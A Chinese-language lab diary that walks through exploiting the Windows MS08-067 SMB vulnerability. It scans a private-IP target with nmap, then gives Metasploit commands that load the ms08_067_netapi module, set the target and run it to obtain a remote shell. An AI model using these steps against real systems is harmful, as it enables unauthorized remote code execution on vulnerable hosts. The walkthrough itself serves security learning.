Bootstrap

网安学习日记-MS08-067远程溢出漏洞学习(CVE-2008-4250)

一、漏洞原理简介

MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。

二、漏洞发现

扫描靶机版本开启的服务

nmap -sV 172.16.1.25

发现靶机开启了445端口,ms08-067漏洞利用的是445端口中的SMB服务

三、利用漏洞

1、打开kali中msfconsole漏洞测试平台

1、搜索ms08-067漏洞利用模块

search ms08-067

2、使用漏洞攻击模块

use exploit/windows/smb/ms08_067_netapi

3、查看该模块需要配置的参数

show options

4、设置目标靶机IP

set RHOST 172.16.1.25

5、运行攻击模块

run

利用成功,成功拿到靶机shell

6、查看信息

我们可以通过此漏洞拿到我们想要的信息及远程控制

利用完成,实验结束

;